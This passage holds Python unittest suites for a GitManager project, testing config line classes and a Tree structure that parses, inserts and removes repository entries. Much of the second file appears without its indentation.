                             'writing root line')

    def test_root(self):
        """ Tests that the root attribute is read correctly """
        cases = [
            (('', '', '/root', ''), '/root'),
            (('\t ', '', 'folder', ''), 'folder'),
        ]
        for (args, expected) in cases:
            self.assertEqual(line.RootLine(*args).root, expected,
                             'root of root line')
class TestNOPLine(unittest.TestCase):
    """ Tests that NOPLine class works properly """
    def test_eq(self):
        """ Checks that equality between NOPLines works properly """
        self.assertEqual(line.NOPLine('# hello world'),
                         line.NOPLine('# hello world'),
                         'equality of comments')
        self.assertEqual(line.NOPLine('# >>> a b'),
                         line.NOPLine('# >>> a b'),
                         'equality of commented out RepoLines')
        self.assertEqual(line.NOPLine('\t # hello world'),
                         line.NOPLine('\t # hello world'),
                         'equality comments with spaces')
        self.assertEqual(line.NOPLine(''), line.NOPLine(''),
                         'equality of empty lines')
        self.assertEqual(line.NOPLine('\t\n '),
                         line.NOPLine('\t\n '),
                         'equality of lines with only spaces')
        # NOTE(review): the two whitespace strings below appear identical
        # ('\t\n '), which would make this assertNotEqual fail -- confirm
        # that two *different* whitespace contents were intended here
        # (trailing whitespace may have been lost in transit).
        self.assertNotEqual(line.NOPLine('\t\n '),
                            line.NOPLine('\t\n '),
                            'inequality of two different NOPLines')
        # a NOPLine never compares equal to another ConfigLine subclass
        self.assertNotEqual(line.NOPLine('\t\n '),
                            line.ConfigLine(''),
                            'inequality between two different objects')
    def test_indent(self):
        """ Tests that the indent function works properly """
        # NOPLines carry no structural indent, so indent is always ''
        self.assertEqual(line.NOPLine('# hello world').indent,
                         '', 'indent of comment line')
        self.assertEqual(line.NOPLine('# >>> a b').indent,
                         '', 'content of commented out RepoLine')
        self.assertEqual(line.NOPLine('\t # hello world').indent,
                         '',
                         'indent of comments with spaces')
        self.assertEqual(line.NOPLine('').indent, '',
                         'indent of empty line')
        self.assertEqual(line.NOPLine('\t\n ').indent, '',
                         'indent of line with only spaces')
    def test_write(self):
        """ Tests that writing NOPLines works properly """
        # write() reproduces the stored content verbatim
        self.assertEqual(line.NOPLine('# hello world').write(),
                         '# hello world', 'writing comment line')
        self.assertEqual(line.NOPLine('# >>> a b').write(),
                         '# >>> a b', 'writing commented out RepoLine')
        self.assertEqual(line.NOPLine('\t # hello world').write(),
                         '\t # hello world',
                         'writing comments with spaces')
        self.assertEqual(line.NOPLine('').write(), '', 'writing empty line')
        self.assertEqual(line.NOPLine('\t\n ').write(), '\t\n ',
                         'writing line with only spaces')
    def test_content(self):
        """ Tests that the content attribute is read correctly """
        # content mirrors the constructor argument unchanged
        self.assertEqual(line.NOPLine('# hello world').content,
                         '# hello world', 'content of comment line')
        self.assertEqual(line.NOPLine('# >>> a b').content,
                         '# >>> a b', 'content of commented out RepoLine')
        self.assertEqual(line.NOPLine('\t # hello world').content,
                         '\t # hello world',
                         'content of comments with spaces')
        self.assertEqual(line.NOPLine('').content, '',
                         'content of empty line')
        self.assertEqual(line.NOPLine('\t\n ').content, '\t\n ',
                         'content of line with only spaces')
class TestBaseLine(unittest.TestCase):
    """ Tests that BaseLine class works properly """

    def test_eq(self):
        """ Tests that equality between BaseLines works properly """
        # identically-constructed BaseLines always compare equal
        for (args, message) in [
            (('', 1, ' ', 'hello', ''),
             'equality between minimal BaseLines'),
            (('', 4, ' ', 'hello', ''),
             'equality between minimal BaseLines with more indent'),
            (('', 1, ' ', 'hello', ' '),
             'equality between complete BaseLines with minimal spacing'),
            (('', 4, ' ', 'hello', ' '),
             'equality between complete BaseLines with minimal '
             'spacing and more indent'),
            (('\t', 4, '\t\t', 'hello', '\t '),
             'equality between complete BaseLines with spacing '
             'and more indent'),
        ]:
            self.assertEqual(line.BaseLine(*args), line.BaseLine(*args),
                             message)
        # a differing depth makes two BaseLines unequal
        self.assertNotEqual(line.BaseLine('', 1, ' ', 'hello', ''),
                            line.BaseLine('', 4, ' ', 'hello', ''),
                            'inequality between different BaseLines')
        # a BaseLine never equals an instance of another class
        self.assertNotEqual(line.BaseLine('', 1, ' ', 'hello', ''),
                            line.ConfigLine(''),
                            'inequality between BaseLine and instance of '
                            'other class')

    def test_indent(self):
        """ Tests that the indent function works properly """
        for (args, expected, message) in [
            (('', 1, ' ', 'hello', ''), '',
             'indent of minimal BaseLine'),
            (('', 4, ' ', 'hello', ''), '',
             'indent of minimal BaseLines with more indent'),
            (('', 1, ' ', 'hello', ' '), '',
             'indent of complete BaseLine with minimal spacing'),
            (('', 4, ' ', 'hello', ' '), '',
             'indent of complete BaseLine with minimal '
             'spacing and more indent'),
            (('\t', 4, '\t\t', 'hello', '\t '), '\t',
             'indent of complete BaseLines with spacing '
             'and more indent'),
        ]:
            self.assertEqual(line.BaseLine(*args).indent, expected, message)

    def test_write(self):
        """ Tests that writing BaseLines works properly """
        for (args, expected, message) in [
            (('', 1, ' ', 'hello', ''), '> hello',
             'writing minimal BaseLine'),
            (('', 4, ' ', 'hello', ''), '>>>> hello',
             'writing minimal BaseLine with more indent'),
            (('', 1, ' ', 'hello', ' '), '> hello ',
             'writing complete BaseLine with minimal spacing'),
            (('', 4, ' ', 'hello', ' '), '>>>> hello ',
             'writing complete BaseLine with minimal spacing '
             'and more indent'),
            (('\t', 4, '\t\t', 'hello', '\t '), '\t>>>>\t\thello\t ',
             'writing complete BaseLine with spacing '
             'and more indent'),
        ]:
            self.assertEqual(line.BaseLine(*args).write(), expected, message)

    def test_depth(self):
        """ Tests that the depth property is read correctly """
        # the depth is the second constructor argument (number of '>'s)
        for (args, expected, message) in [
            (('', 1, ' ', 'hello', ''), 1,
             'reading depth of minimal BaseLine'),
            (('', 4, ' ', 'hello', ''), 4,
             'reading depth of minimal BaseLine with more indent'),
            (('', 1, ' ', 'hello', ' '), 1,
             'reading depth of complete BaseLine with minimal '
             'spacing'),
            (('', 4, ' ', 'hello', ' '), 4,
             'reading depth of complete BaseLine with minimal '
             'spacing and more indent'),
            (('\t', 4, '\t\t', 'hello', '\t '), 4,
             'reading depth of complete BaseLine with spacing '
             'and more indent'),
        ]:
            self.assertEqual(line.BaseLine(*args).depth, expected, message)

    def test_path(self):
        """ Tests that the path property is read correctly """
        # every sample below stores 'hello' as its path
        for (args, message) in [
            (('', 1, ' ', 'hello', ''),
             'reading path of minimal BaseLine'),
            (('', 4, ' ', 'hello', ''),
             'reading path of minimal BaseLine with more indent'),
            (('', 1, ' ', 'hello', ' '),
             'reading path of complete BaseLine with minimal '
             'spacing'),
            (('', 4, ' ', 'hello', ' '),
             'reading path of complete BaseLine with minimal '
             'spacing and more indent'),
            (('\t', 4, '\t\t', 'hello', '\t '),
             'reading path of complete BaseLine with spacing '
             'and more indent'),
        ]:
            self.assertEqual(line.BaseLine(*args).path, 'hello', message)
class TestRepoLine(unittest.TestCase):
    """ Tests that RepoLine class works properly """

    def test_eq(self):
        """ Tests that equality between repo lines works properly """
        # identically-constructed RepoLines always compare equal
        for (args, message) in [
            (('', 'a', '', '', ''),
             'equality between minimal RepoLines'),
            (('', 'a', ' ', 'b', ''),
             'equality between minimal but complete RepoLines'),
            (('\t', 'a', '\t\t', 'b', '\t\t\t'),
             'equality RepoLines with spacing'),
        ]:
            self.assertEqual(line.RepoLine(*args), line.RepoLine(*args),
                             message)
        # differing spacing makes two RepoLines unequal
        self.assertNotEqual(line.RepoLine('', 'a', '', '', ''),
                            line.RepoLine(' ', 'a', '', '', ''),
                            'inequality between different RepoLines')
        # a RepoLine never equals an instance of another class
        self.assertNotEqual(line.RepoLine('', 'a', '', '', ''),
                            line.ConfigLine(' '),
                            'inequality between RepoLine and instance of a '
                            'different class')

    def test_indent(self):
        """ Tests that the indent function works properly """
        for (args, expected, message) in [
            (('', 'a', '', '', ''), '',
             'indent of minimal RepoLine'),
            (('', 'a', ' ', 'b', ''), '',
             'indent of minimal but complete RepoLine'),
            (('\t', 'a', '\t\t', 'b', '\t\t\t'), '\t',
             'indent of RepoLine with spacing'),
        ]:
            self.assertEqual(line.RepoLine(*args).indent, expected, message)

    def test_write(self):
        """ Tests that writing RepoLines works properly """
        for (args, expected, message) in [
            (('', 'a', '', '', ''), 'a',
             'writing minimal RepoLine'),
            (('', 'a', ' ', 'b', ''), 'a b',
             'writing minimal but complete RepoLine'),
            (('\t', 'a', '\t\t', 'b', '\t\t\t'), '\ta\t\tb\t\t\t',
             'writing RepoLine with spacing'),
        ]:
            self.assertEqual(line.RepoLine(*args).write(), expected, message)

    def test_url(self):
        """ Tests that the url property is read properly """
        # every sample below stores 'a' as its url
        for (args, message) in [
            (('', 'a', '', '', ''),
             'getting url of minimal RepoLine'),
            (('', 'a', ' ', 'b', ''),
             'getting url of minimal but complete RepoLine'),
            (('\t', 'a', '\t\t', 'b', '\t\t\t'),
             'getting url of RepoLine with spacing'),
        ]:
            self.assertEqual(line.RepoLine(*args).url, 'a', message)

    def test_path(self):
        """ Tests that the path property is read properly """
        for (args, expected, message) in [
            (('', 'a', '', '', ''), '',
             'getting path of minimal RepoLine'),
            (('', 'a', ' ', 'b', ''), 'b',
             'getting path of minimal but complete RepoLine'),
            (('\t', 'a', '\t\t', 'b', '\t\t\t'), 'b',
             'getting path of RepoLine with spacing'),
        ]:
            self.assertEqual(line.RepoLine(*args).path, expected, message)
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.config import tree, line
from GitManager.repo import description as d
from GitManager.repo.implementation import LocalRepository
class TestTree(unittest.TestCase):
""" Tests that Tree() can be correctly parsed and changed """
def test_lines(self):
""" Test that the lines are correctly initialised """
t = tree.Tree()
self.assertEqual(t.lines, [], "by default, lines are empty")
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_root(self, os_path_expanduser: unittest.mock.Mock):
""" Test that the lines are correctly initialised """
t = tree.Tree()
self.assertEqual(t.root, '/path/to/home', "by default root is /home")
t = tree.Tree()
t.lines = [line.RootLine('', '', 'root', '')]
self.assertEqual(t.root, '/path/to/home/root', "setting relative root")
t = tree.Tree()
t.lines = [line.RootLine('', '', '/opt/root', '')]
self.assertEqual(t.root, '/opt/root', "setting absolute root")
t = tree.Tree()
t.lines = [line.RootLine('', '', '/opt/root', ''),
line.RootLine('', '', '/opt/root/second', '')]
self.assertEqual(t.root, '/opt/root',
"setting root ignores first root")
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_descriptions(self, os_path_expanduser: unittest.mock.Mock):
""" Tests that the descriptions are yielded properly """
# create a tree instance
t = tree.Tree()
# setup the lines properly
t.lines = [
line.NOPLine("# Top level line with a comment"),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'something', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 2, ' ', 'sub', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'else', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
]
# the intended results
results = [
d.RepositoryDescription(source='hello',
path='/path/to/home/world'),
d.BaseDescription('/path/to/home/something'),
d.RepositoryDescription(source='hello',
path='/path/to/home/something/world'),
d.BaseDescription('/path/to/home/something/sub'),
d.RepositoryDescription(source='hello',
path='/path/to/home/something/sub/world'),
d.BaseDescription('/path/to/home/else'),
d.RepositoryDescription(source='hello',
path='/path/to/home/else/world')
]
# check that the yielding works properly
for (i, (actual, intended)) in enumerate(zip(t.descriptions, results)):
self.assertEqual(actual,
(i + 1, intended), "Lines parsed properly")
# reset the lines to something that should thrown an error
t.lines = [
line.BaseLine('', 2, ' ', 'something', '')
]
# we are skipping a base level -- this should thrown an error
with self.assertRaises(Exception):
list(t.repositories)
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_repositories(self, os_path_expanduser: unittest.mock.Mock):
""" Tests that the repositories are yielded properly """
# create a tree instance
t = tree.Tree()
# setup the lines properly
t.lines = [
line.NOPLine("# Top level line with a comment"),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'something', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 2, ' ', 'sub', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'else', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' ')
]
# the intended results
results = [
d.RepositoryDescription(source='hello',
path='/path/to/home/world'),
d.RepositoryDescription(source='hello',
path='/path/to/home/something/world'),
d.RepositoryDescription(source='hello',
path='/path/to/home/something/sub/world'),
d.RepositoryDescription(source='hello',
path='/path/to/home/else/world')
]
# check that the yielding works properly
for (actual, intended) in zip(t.repositories, results):
self.assertEqual(actual, intended, "Lines parsed properly")
# reset the lines to something that should thrown an error
t.lines = [
line.BaseLine('', 2, ' ', 'something', '')
]
# we are skipping a base level -- this should thrown an error
with self.assertRaises(Exception):
list(t.repositories)
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_locals(self, os_path_expanduser: unittest.mock.Mock):
""" Tests that the locals are yielded properly """
# create a tree instance
t = tree.Tree()
# setup the lines properly
t.lines = [
line.NOPLine("# Top level line with a comment"),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'something', ' '),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 2, ' ', 'sub', ' '),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'else', ' '),
line.RepoLine(' ', 'hello', ' ', 'world', ' ')
]
# the intended results
results = [
LocalRepository('/path/to/home/world'),
LocalRepository('/path/to/home/something/world'),
LocalRepository('/path/to/home/something/sub/world'),
LocalRepository('/path/to/home/else/world')
]
# check that the yielding works properly
for (actual, intended) in zip(t.locals, results):
self.assertEqual(actual, intended, "Locals parsed properly")
# reset the lines to something that should thrown an error
t.lines = [
line.BaseLine('', 2, ' ', 'something', '')
]
# we are skipping a base level -- this should thrown an error
with self.assertRaises(Exception):
list(t.locals)
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_index(self, os_path_expanduser: unittest.mock.Mock):
""" Tests that the index function works properly """
# create a tree instance
t = tree.Tree()
# setup the lines properly
t.lines = [
line.NOPLine("# Top level line with a comment"),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'something', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 2, ' ', 'sub', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'else', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' ')
]
# the intended results
results = [
d.RepositoryDescription(source='hello',
path='/path/to/home/world'),
d.BaseDescription('/path/to/home/something'),
d.RepositoryDescription(source='hello',
path='/path/to/home/something/world'),
d.BaseDescription('/path/to/home/something/sub'),
d.RepositoryDescription(source='hello',
path='/path/to/home/something/sub/world'),
d.BaseDescription('/path/to/home/else'),
d.RepositoryDescription(source='hello',
path='/path/to/home/else/world')
]
# check that the indexes are found properly
for (i, r) in enumerate(results):
self.assertEqual(t.index(r), i + 1, "Lines found as intended")
self.assertEqual(t.index(d.BaseDescription('/path/to/home/weird')),
None,
"Lines not found as intended")
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_contains(self, os_path_expanduser: unittest.mock.Mock):
""" Tests that the contains function works properly """
# create a tree instance
t = tree.Tree()
# setup the lines properly
t.lines = [
line.NOPLine("# Top level line with a comment"),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'something', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 2, ' ', 'sub', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'else', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' ')
]
# the intended results
results = [
d.RepositoryDescription(source='hello',
path='/path/to/home/world'),
d.BaseDescription('/path/to/home/something'),
d.RepositoryDescription(source='hello',
path='/path/to/home/something/world'),
d.BaseDescription('/path/to/home/something/sub'),
d.RepositoryDescription(source='hello',
path='/path/to/home/something/sub/world'),
d.BaseDescription('/path/to/home/else'),
d.RepositoryDescription(source='hello',
path='/path/to/home/else/world')
]
# check that the indexes are found properly
for (i, r) in enumerate(results):
self.assertTrue(t.contains(r), "Lines found as intended")
self.assertFalse(t.contains(d.BaseDescription('/path/to/home/weird')),
"Lines not found as intended")
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_insert_at(self, os_path_expanduser: unittest.mock.Mock):
""" Tests that the contains function works properly """
def setup_tree() -> tree.Tree:
# create a tree instance and setup lines
t = tree.Tree()
t.lines = [
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', '')
]
return t
#
# INSERT FAILURES -- for RepositoryDescriptions
#
t1 = setup_tree()
# Inserting into something that doesn't exist throws a ValueError
with self.assertRaises(ValueError):
t1.insert_at(
d.BaseDescription('/path/to/home/else'),
d.RepositoryDescription(source='git@example.com:/example/repo',
path='/path/to/home/else/hello')
)
t2 = setup_tree()
# Inserting into the wrong parent also throws ValueError
with self.assertRaises(ValueError):
t2.insert_at(
d.BaseDescription('/path/to/home/else'),
d.RepositoryDescription(source='git@example.com:/example/repo',
path='/path/to/home/weird/hello')
)
t3 = setup_tree()
# Inserting into the wrong parent also throws ValueError
with self.assertRaises(ValueError):
t2.insert_at(
None,
d.RepositoryDescription(source='git@example.com:/example/repo',
path='/path/to/home/weird/hello')
)
#
# INSERT SUCCESS -- for RepositoryDescriptions
#
t4 = setup_tree()
d4 = d.RepositoryDescription(
source='git@example.com:/example/insertion',
path='/path/to/home/insertion')
# at the very top
self.assertEqual(t4.insert_at(None, d4), 1, 'Inserting a repository '
'top-level')
self.assertEqual(t4.lines, [
line.NOPLine("# comment"),
line.RepoLine(' ', 'git@example.com:/example/insertion', '', '',
''),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', '')
])
# inside of an empty group
t5 = setup_tree()
d5 = d.RepositoryDescription(
source='git@example.com:/example/insertion',
path='/path/to/home/base1/insertion')
p5 = d.BaseDescription('/path/to/home/base1')
self.assertEqual(t5.insert_at(p5, d5), 2, 'Inserting a repository '
'into an empty group')
self.assertEqual(t5.lines, [
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.RepoLine(' ', 'git@example.com:/example/insertion', '', '',
''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', '')
])
# inside of a full group
t6 = setup_tree()
d6 = d.RepositoryDescription(
source='git@example.com:/example/insertion',
path='/path/to/home/base2/point')
p6 = d.BaseDescription('/path/to/home/base2')
self.assertEqual(t6.insert_at(p6, d6), 4, 'Inserting a repository '
'into a full group')
self.assertEqual(t6.lines, [
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', ''),
line.RepoLine(' ', 'git@example.com:/example/insertion', ' ',
'point', ''),
])
#
# INSERT SUCCESS -- for BaseDescriptions
#
t7 = setup_tree()
d7 = d.BaseDescription('/path/to/home/insertion')
# at the very top
self.assertEqual(t7.insert_at(None, d7), 4, 'Inserting a base '
'top-level')
self.assertEqual(t7.lines, [
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', ''),
line.BaseLine(' ', 1, ' ', 'insertion', '')
])
# inside of an empty group
t8 = setup_tree()
d8 = d.BaseDescription('/path/to/home/base1/insertion')
p8 = d.BaseDescription('/path/to/home/base1')
self.assertEqual(t8.insert_at(p8, d8), 2, 'Inserting a base '
'into an empty group')
self.assertEqual(t8.lines, [
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 2, ' ', 'insertion', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', '')
])
# inside of a full group
t9 = setup_tree()
d9 = d.BaseDescription('/path/to/home/base2/insertion')
p9 = d.BaseDescription('/path/to/home/base2')
self.assertEqual(t9.insert_at(p9, d9), 4, 'Inserting a base '
'into a full group')
self.assertEqual(t9.lines, [
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', ''),
line.BaseLine(' ', 2, ' ', 'insertion', ''),
])
# inside of a full group
t10 = setup_tree()
d10 = d.BaseDescription('/insertion')
p10 = d.BaseDescription('/path/to/home/base2')
self.assertEqual(t10.insert_at(p10, d10), 4, 'Inserting a base with'
'absolute path')
self.assertEqual(t10.lines, [
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', ''),
line.BaseLine(' ', 2, ' ', '/insertion', ''),
])
    @unittest.mock.patch('os.path.expanduser',
                         side_effect=lambda s: s.replace("~",
                                                         "/path/to/home/"))
    def test_insert_base_or_get(self, os_path_expanduser: unittest.mock.Mock):
        """ Tests that insert_base_or_get creates missing bases (including
        intermediate sub-levels) and returns the line index of an already
        existing base unchanged """

        def setup_tree() -> tree.Tree:
            # create a tree instance and setup lines
            t = tree.Tree()
            t.lines = [
                line.NOPLine("# comment"),
                line.BaseLine(' ', 1, ' ', 'base1', ''),
                line.BaseLine(' ', 1, ' ', 'base2', ''),
                line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
                              'example-repo', '')
            ]
            return t

        # inserting an existing base -- do nothing
        t1 = setup_tree()
        d1 = d.BaseDescription('/path/to/home/base1')
        self.assertEqual(t1.insert_base_or_get(d1), 1, 'inserting an '
                                                       'existing base')
        # the tree must be left completely unchanged
        self.assertEqual(
            t1.lines,
            [
                line.NOPLine("# comment"),
                line.BaseLine(' ', 1, ' ', 'base1', ''),
                line.BaseLine(' ', 1, ' ', 'base2', ''),
                line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
                              'example-repo', '')
            ]
        )

        # inserting a new base top-level
        t2 = setup_tree()
        d2 = d.BaseDescription('/path/to/home/base3')
        self.assertEqual(t2.insert_base_or_get(d2), 4, 'inserting a new '
                                                       'top-level base')
        # the new base is appended at the end with depth 1
        self.assertEqual(
            t2.lines,
            [
                line.NOPLine("# comment"),
                line.BaseLine(' ', 1, ' ', 'base1', ''),
                line.BaseLine(' ', 1, ' ', 'base2', ''),
                line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
                              'example-repo', ''),
                line.BaseLine(' ', 1, ' ', 'base3', '')
            ]
        )

        # inserting an absolute path
        t3 = setup_tree()
        d3 = d.BaseDescription('/base3')
        self.assertEqual(t3.insert_base_or_get(d3), 4, 'inserting a new '
                                                       'absolute-path base')
        # a path outside the (mocked) home directory stays absolute
        self.assertEqual(
            t3.lines,
            [
                line.NOPLine("# comment"),
                line.BaseLine(' ', 1, ' ', 'base1', ''),
                line.BaseLine(' ', 1, ' ', 'base2', ''),
                line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
                              'example-repo', ''),
                line.BaseLine(' ', 1, ' ', '/base3', '')
            ]
        )

        # inserting a single sublevel
        t4 = setup_tree()
        d4 = d.BaseDescription('/path/to/home/base1/a')
        self.assertEqual(t4.insert_base_or_get(d4), 2, 'inserting a single '
                                                       'new sub-level base')
        # the new base goes directly below its parent with depth 2
        self.assertEqual(
            t4.lines,
            [
                line.NOPLine("# comment"),
                line.BaseLine(' ', 1, ' ', 'base1', ''),
                line.BaseLine(' ', 2, ' ', 'a', ''),
                line.BaseLine(' ', 1, ' ', 'base2', ''),
                line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
                              'example-repo', '')
            ]
        )

        # inserting multiple sublevels
        t5 = setup_tree()
        d5 = d.BaseDescription('/path/to/home/base1/a/b/c')
        self.assertEqual(t5.insert_base_or_get(d5), 4, 'inserting multiple '
                                                       'new sub-level bases')
        # every missing intermediate base is created with increasing depth
        self.assertEqual(
            t5.lines,
            [
                line.NOPLine("# comment"),
                line.BaseLine(' ', 1, ' ', 'base1', ''),
                line.BaseLine(' ', 2, ' ', 'a', ''),
                line.BaseLine(' ', 3, ' ', 'b', ''),
                line.BaseLine(' ', 4, ' ', 'c', ''),
                line.BaseLine(' ', 1, ' ', 'base2', ''),
                line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
                              'example-repo', ''),
            ]
        )
    @unittest.mock.patch('os.path.expanduser',
                         side_effect=lambda s: s.replace("~",
                                                         "/path/to/home/"))
    def test_insert_repo_or_get(self, os_path_expanduser: unittest.mock.Mock):
        """ Tests that insert_repo_or_get inserts missing repositories
        (creating intermediate bases as needed) and returns the line index of
        an already existing repository unchanged """

        def setup_tree() -> tree.Tree:
            # create a tree instance and setup lines
            t = tree.Tree()
            t.lines = [
                line.NOPLine("# comment"),
                line.BaseLine(' ', 1, ' ', 'base1', ''),
                line.BaseLine(' ', 1, ' ', 'base2', ''),
                line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
                              'example-repo', '')
            ]
            return t

        # inserting an existing repo -- do nothing
        t1 = setup_tree()
        d1 = d.RepositoryDescription('git@example.com:/example/repo',
                                     '/path/to/home/base2/example-repo')
        self.assertEqual(t1.insert_repo_or_get(d1), 3, 'inserting an '
                                                       'existing repo')
        # the tree must be left completely unchanged
        self.assertEqual(
            t1.lines,
            [
                line.NOPLine("# comment"),
                line.BaseLine(' ', 1, ' ', 'base1', ''),
                line.BaseLine(' ', 1, ' ', 'base2', ''),
                line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
                              'example-repo', '')
            ]
        )

        # inserting a new repo top-level
        t2 = setup_tree()
        d2 = d.RepositoryDescription('git@example.com:/example/insert',
                                     '/path/to/home/insert')
        self.assertEqual(t2.insert_repo_or_get(d2), 1, 'inserting a new '
                                                       'top-level repo')
        # the repo line is stored without an explicit folder name (the final
        # path component matches the url's final component)
        self.assertEqual(
            t2.lines,
            [
                line.NOPLine("# comment"),
                line.RepoLine(' ', 'git@example.com:/example/insert', '',
                              '', ''),
                line.BaseLine(' ', 1, ' ', 'base1', ''),
                line.BaseLine(' ', 1, ' ', 'base2', ''),
                line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
                              'example-repo', '')
            ]
        )

        # inserting a new repo with multiple sublevels
        t5 = setup_tree()
        d5 = d.RepositoryDescription('git@example.com:/example/insert',
                                     '/path/to/home/base1/a/b/c/insert')
        self.assertEqual(t5.insert_repo_or_get(d5), 5, 'inserting a new '
                                                       'repo and sub-levels')
        # intermediate bases a/b/c are created before the repo line itself
        self.assertEqual(
            t5.lines,
            [
                line.NOPLine("# comment"),
                line.BaseLine(' ', 1, ' ', 'base1', ''),
                line.BaseLine(' ', 2, ' ', 'a', ''),
                line.BaseLine(' ', 3, ' ', 'b', ''),
                line.BaseLine(' ', 4, ' ', 'c', ''),
                line.RepoLine(' ', 'git@example.com:/example/insert',
                              '', '', ''),
                line.BaseLine(' ', 1, ' ', 'base2', ''),
                line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
                              'example-repo', ''),
            ]
        )
    @unittest.mock.patch('os.path.expanduser',
                         side_effect=lambda s: s.replace("~",
                                                         "/path/to/home/"))
    def test_remove_local(self, os_path_expanduser: unittest.mock.Mock):
        """ Tests that removing local repositories works properly """

        # create a tree instance
        t = tree.Tree()
        # setup the lines properly
        t.lines = [
            line.NOPLine("# Top level line with a comment"),
            line.RepoLine(' ', 'hello', ' ', 'hello', ' '),
            line.BaseLine('', 1, ' ', 'something', ''),
            line.RepoLine(' ', 'something/world', ' ', 'world', ' '),
            line.BaseLine('', 2, ' ', 'sub', ''),
            line.RepoLine(' ', 'something/sub/hello', ' ', 'hello', ' '),
            line.BaseLine('', 1, ' ', 'else', ''),
            line.RepoLine(' ', 'something/else/world', ' ', 'world', ' ')
        ]

        # the expected array after the lines were removed: identical to the
        # setup above except that the trailing 'something/else/world' repo
        # line is gone (its 'else' base line is kept)
        result = [
            line.NOPLine("# Top level line with a comment"),
            line.RepoLine(' ', 'hello', ' ', 'hello', ' '),
            line.BaseLine('', 1, ' ', 'something', ''),
            line.RepoLine(' ', 'something/world', ' ', 'world', ' '),
            line.BaseLine('', 2, ' ', 'sub', ''),
            line.RepoLine(' ', 'something/sub/hello', ' ', 'hello', ' '),
            line.BaseLine('', 1, ' ', 'else', '')
        ]

        # check that an existing repo gets removed
        # NOTE(review): LocalRepository is referenced unqualified here --
        # presumably imported at the top of this file; confirm.
        didRemove = t.remove_local(LocalRepository('/path/to/home/else/world'))
        self.assertTrue(didRemove)
        self.assertEqual(t.lines, result, 'Removed existing repo')

        # check that a non-existing repository does not get removed
        didNotRemove = t.remove_local(
            LocalRepository('/path/to/home/nonexistent')
        )
        self.assertFalse(didNotRemove)
        self.assertEqual(t.lines, result, 'Did not remove any lines')
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
